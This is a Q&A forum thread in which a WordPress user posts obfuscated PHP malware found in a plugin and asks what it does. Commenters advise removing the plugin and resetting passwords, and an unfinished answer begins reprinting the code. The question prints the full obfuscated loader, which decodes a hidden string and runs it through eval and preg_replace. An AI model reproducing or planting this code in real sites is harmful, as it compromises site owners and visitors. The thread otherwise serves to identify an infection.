# What does this malicious-looking code do?

Tags: php, wordpress, plugins

I recently discovered some malicious-looking code in a remote file within a WordPress plugin. It's very long and looks very odd. I deleted it and my site went from HTTP 500 error on every page except from the homepage, to normal again...

EDIT: This is it http://blog.sucuri.net/2014/07/malware-infection-breaking-wordpress-sites.html

```
<?php $hqjfikzgcz = 'k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;29%57%x65","%x65%166%x61%154%x28%151%x6d%1667y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c]445]212]445]43]321]464]284]364]6]234]342]58]24]31#-%x5c%x7825tdx7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<**h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#6%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%z*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%xx5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c7860%x5c%x7878%x5c%x7-%x5c%x7824gps)%x5c%x76]y6g]257]y86]267]y74]275]y7:]268]y7f#<7]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317lace("%x2f%50%x2e%52%xd%x5c%x7825w6Z6<.4%x5c%x7860hA%x57825V<#65,47R25,d7R17,67R37,#%x]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-pmpusut)tpqssutRe%x5c%x78257825-qp%x5c%x7825)54l}%c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]D#]y74]273]y76]252]y85]25SFGTOBSUOSVUFS,6<*msv7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878d%x5c%x7825w6Z6<.3%x5c%xx7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x78245c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x78osvufs!|ftmf!~<**9.-j%x5c%x7827824gvodujpo!%x5c%x7824-%x5c%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fc%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f75c%x7824tvctus)%x5c%x7825%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%2f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%xc%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<7824<!%x5c%x7825o:!>!%x5c%x78242178}527}utjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x57825!<*::::::-111112)eobs%x5c%x7860u!#]y76]277]y72]265]y39]271]y83]256pd#)tutjyf%x5c%x7860opjud7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x82#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]%x7825zB%x5c%x7825z>!tussfw)%x5c%x7mjgA%x5c%x7827doj%x5c%x78256<c%x7827pd%x5c%x78256<pTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5%x5c%x787f<u%x5c%x7825V%x5c%x7827{tmw)%x5c%x7825tww**WYsboepn)%x7860QUUI&c_UOFHB%x5c%x7860825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x78255946-tr.984:75983:48984:71]K9]7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-x5c%x7825z>>2*!%x5c%x78c%x7825:<**#57]38y]47])Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x787824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x78,27R66,#%x5c%x782fq%x5%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]2824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]278]x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x24-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x%x5c%x787fw6*%x5c%x787f_*#7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%NULL); }n>qp%x5c%x7825!|Z~!<##!>!2p%x5c%xc%x787f;!opjudovg}k~~9{d%#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%2%x66%152%x66%147%x67%42%x2c%163%x74%162%x55c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7878:56985:6197g:74985-rr.93e:5597f-s.973:8ovg%x5c%x7822)!gj}1~!<2p%x5c]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68]y1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esx5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x78C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6k;opjudovg}%x5c%x7878;0]=])0#)U)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[) && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { 5)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=7-NBFSUT%x5c%x7860LDPT7-U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6%x7860hA%x5c%x7827pd%x5c%x78256<px5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%25tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y75bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%xgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<jyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)fmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnc%x7825)uqpuft%x5c%x7860msvd},;uqpuft%27u%x5c%x7825)7fmji%x5c%x78786<5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{625>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%65%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f][%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x782258]y6g]273]y76]271]y%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x782f%x5c%x7825z<jg!)%<%x5c%x787fw6<*K)ftpmdXA825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<7825!|!*!***b%x5c%x7825)sf%x5c55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", 6~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5)tpqsut>j%x5c%x7825!*9!%x588:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]x5c%x7825:osvufs:~9284y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x25:-t%x5c%x7825)3of:opjudovg<~%x5c%x%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:5c%x782f#o]#%x5c%x782f*)323zbe!63]y3:]68]y76#<%x5c%x78825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#Qw2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%0%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%160%x28%4-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x78246]271]y7d]252]y74]256]y39]252]y83]273]y72]2!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825w)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^Wx5c%x7825r%x5c%x7878Bsfuvso!sboepn)%c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%82f7^#iubq#%x5c%x785cq%x5c%x78252#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)37860hA%x5c%x7827pd%x5+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%xof>2bd%x5c%x7825!<5h%x5c%x7825%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5cnfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]425c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bu%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x525z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x785cq%x5c%x7825%x5c%xx5c%x7825ggg!>!#]y81]273]y76]258]y6g%x7878pmpusut!-#j0#!%x5c%x782f!**#s5-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x78<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x7825!>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%25j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825($n)-1);} @error_reporting(0); preg_rep825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860ope%x5c%x78b%x5c%x7825w:!bE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q&6|7**111127-K)ebfsX%x5c%x785c%x7825<#462]47y]252]18x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5822l:!}V;3q%x5c%x7825}U;y]}R;h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutif((function_exists("%x6f%142%x5f%163%x74%141%x72%164"5!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x782%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x7]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]KXAZASV<*w%x5c%x7825)ppde>u%x5c%xy35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x75%156%x61"]=1; function fjfgg($n){return chr(ord7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R;msv}7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussf%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7f%163%x70%154%x69%164%50%x22%134%x78%62%x35%16<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x7.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%xjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%$GLOBALS["%x61%156%x>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)t1Ld]245]K2]285]Ke]53Ld]53]Kc]+opjudovg+)!gj+{e%x5c%x%x78257**^#zsfvr#%x5c827,*c%x5c%x7827,*b%x5c%x7827)fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)%x7878{**#k#)tutjyf%x5c%x%x5c%x787fw6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj34]68]y33]65]y31]53]y6d]281]y43]78]y%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gjy72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>x5c%x7860UQPMSVD!-id%x5-#N#*%x5c%x7824%x5c%x782f%xEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5cx7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x78SFTV%x5c%x7860QUUI&b%x5c*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x782p>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubEc%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825c%x782fq%x5c%x7825>U<#16,47R57ce44#)zbssb!>!ssbnpe_GMFT%x5/(.*)/epreg_replaceligcmavovh'; $aedsarxrxu = explode(chr((279-235)),'8157,54,4068,52,9207,20,8493,49,7703,39,621,22,35,43,6385,63,3497,43,8965,45,5319,60,6260,23,7845,23,2900,46,4368,33,643,33,2221,22,997,24,6814,21,821,42,5144,54,5824,65,1327,58,7971,28,5113,31,3940,48,5262,57,4308,60,5580,24,4938,68,4248,25,1605,37,9438,63,8304,47,7537,53,9010,54,6723,32,8598,50,9316,21,6143,47,7333,22,1988,52,3236,26,9367,46,1227,46,2192,29,6958,39,1739,64,8814,42,2477,50,929,21,4637,65,1273,54,4019,49,0,35,6997,66,8253,51,9706,23,5075,38,3766,61,1186,41,7788,57,9113,40,1128,30,7426,57,5198,64,8856,42,9863,69,5952,27,9992,55,7184,33,7868,45,7742,46,3713,53,9932,60,5006,69,1963,25,3637,28,4464,58,209,35,2401,44,6755,59,6895,30,7217,46,8898,67,9337,30,4702,59,1893,36,3338,33,5663,30,7391,35,4897,41,6835,60,950,47,771,27,2572,66,10078,28,1570,35,9756,33,2373,28,9839,24,5452,50,7128,56,8211,42,4120,62,5502,57,8648,66,9064,49,798,23,8023,52,3371,25,6031,21,9227,37,1682,57,8104,53,4827,70,9293,23,9581,55,7483,54,2311,34,244,40,8405,32,676,31,10047,31,2812,22,6682,41,4401,63,9413,25,480,21,8075,29,3827,68,3988,31,4273,35,5889,63,6229,31,3895,45,4522,51,6504,43,2102,55,9636,70,905,24,523,39,6547,55,1839,54,2550,22,78,67,4182,66,284,62,6052,55,7999,24,2638,67,6107,36,1642,40,5979,52,5431,21,3262,68,9789,50,3188,48,1385,30,1021,48,6448,56,7590,58,2770,42,3009,60,1158,28,8772,42,501,22,5604,59,2040,62,2705,65,8437,56,8714,58,6602,44,9537,44,346,43,6646,36,431,49,2157,35,6283,66,2243,68,1515,55,2345,28,2834,66,3596,41,3069,61,6190,39,2445,32,8351,54,863,42,4761,66,2946,63,9264,29,5693,65,5379,52,4573,64,7063,65,562,59,145,64,389,42,1069,59,1457,58,3540,56,7648,55,9153,54,3130,58,8542,56,6925,33,6349,36,1803,36,5559,21,2527,23,7263,70,1415,42,7913,58,3396,61,9729,27,3457,40,7355,36,707,64,1929,34,3665,48,9501,36,5758,66,3330,8'); $qabxkhdqko=substr($hqjfikzgcz,(38694-28588),(41-34)); if (!function_exists('jfgitccmer')) { function jfgitccmer($lirydcgfik, $ovmrwembqq) { $tozjzswwnv = NULL; for($qpotywmsnh=0;$qpotywmsnh<(sizeof($lirydcgfik)/2);$qpotywmsnh++) { $tozjzswwnv .= substr($ovmrwembqq, $lirydcgfik[($qpotywmsnh*2)],$lirydcgfik[($qpotywmsnh*2)+1]); } return $tozjzswwnv; };} $vjdxsgvpaf="\x20\57\x2a\40\x6c\144\x6d\164\x66\156\x78\165\x68\154\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\66\x36\55\x31\62\x39\51\x29\54\x20\143\x68\162\x28\50\x35\62\x33\55\x34\63\x31\51\x29\54\x20\152\x66\147\x69\164\x63\143\x6d\145\x72\50\x24\141\x65\144\x73\141\x72\170\x72\170\x75\54\x24\150\x71\152\x66\151\x6b\172\x67\143\x7a\51\x29\51\x3b\40\x2f\52\x20\150\x71\165\x6f\170\x69\146\x67\151\x74\40\x2a\57\x20"; $qafogaxdeu=substr($hqjfikzgcz,(36023-25910),(50-38)); $qafogaxdeu($qabxkhdqko, $vjdxsgvpaf, NULL); $qafogaxdeu=$vjdxsgvpaf; $qafogaxdeu=(800-679); $hqjfikzgcz=$qafogaxdeu-1; ?>
```

Comment: Delete that plugin, reset all your passwords and re-install Wordpress.

Comment: You should put the code on pastebin, to make it more readable.

Comment: @dan08 that code has been obfuscated anyway... pastebin isn't gonna make it any more readable

Answer (score 3):

(ANSWER INCOMPLETE... Will complete after work today....)

Breakdown:

Code in a more legible format:

```
$hqjfikzgcz = 'k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;29%57%x65","%x65%166%x61%154%x28%151%x6d%1667y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c]445]212]445]43]321]464]284]364]6]234]342]58]24]31#-%x5c%x7825tdx7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<**h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#6%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%z*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%xx5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c7860%x5c%x7878%x5c%x7-%x5c%x7824gps)%x5c%x76]y6g]257]y86]267]y74]275]y7:]268]y7f#<7]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317lace("%x2f%50%x2e%52%xd%x5c%x7825w6Z6<.4%x5c%x7860hA%x57825V<#65,47R25,d7R17,67R37,#%x]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-pmpusut)tpqssutRe%x5c%x78257825-qp%x5c%x7825)54l}%c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]D#]y74]273]y76]252]y85]25SFGTOBSUOSVUFS,6<*msv7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878d%x5c%x7825w6Z6<.3%x5c%xx7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x78245c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x78osvufs!|ftmf!~<**9.-j%x5c%x7827824gvodujpo!%x5c%x7824-%x5c%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fc%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f75c%x7824tvctus)%x5c%x7825%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%2f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%xc%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<7824<!%x5c%x7825o:!>!%x5c%x78242178}527}utjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x57825!<*::::::-111112)eobs%x5c%x7860u!#]y76]277]y72]265]y39]271]y83]256pd#)tutjyf%x5c%x7860opjud7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x82#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]%x7825zB%x5c%x7825z>!tussfw)%x5c%x7mjgA%x5c%x7827doj%x5c%x78256<c%x7827pd%x5c%x78256<pTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5%x5c%x787f<u%x5c%x7825V%x5c%x7827{tmw)%x5c%x7825tww**WYsboepn)%x7860QUUI&c_UOFHB%x5c%x7860825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x78255946-tr.984:75983:48984:71]K9]7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-x5c%x7825z>>2*!%x5c%x78c%x7825:<**#57]38y]47])Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x787824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x78,27R66,#%x5c%x782fq%x5%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]2824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]278]x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x24-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x%x5c%x787fw6*%x5c%x787f_*#7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%NULL); }n>qp%x5c%x7825!|Z~!<##!>!2p%x5c%xc%x787f;!opjudovg}k~~9{d%#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%2%x66%152%x66%147%x67%42%x2c%163%x74%162%x55c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7878:56985:6197g:74985-rr.93e:5597f-s.973:8ovg%x5c%x7822)!gj}1~!<2p%x5c]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68]y1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esx5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x78C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6k;opjudovg}%x5c%x7878;0]=])0#)U)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[) && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { 5)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=7-NBFSUT%x5c%x7860LDPT7-U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6%x7860hA%x5c%x7827pd%x5c%x78256<px5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%25tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y75bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%xgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<jyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)fmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnc%x7825)uqpuft%x5c%x7860msvd},;uqpuft%27u%x5c%x7825)7fmji%x5c%x78786<5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{625>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%65%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f][%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x782258]y6g]273]y76]271]y%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k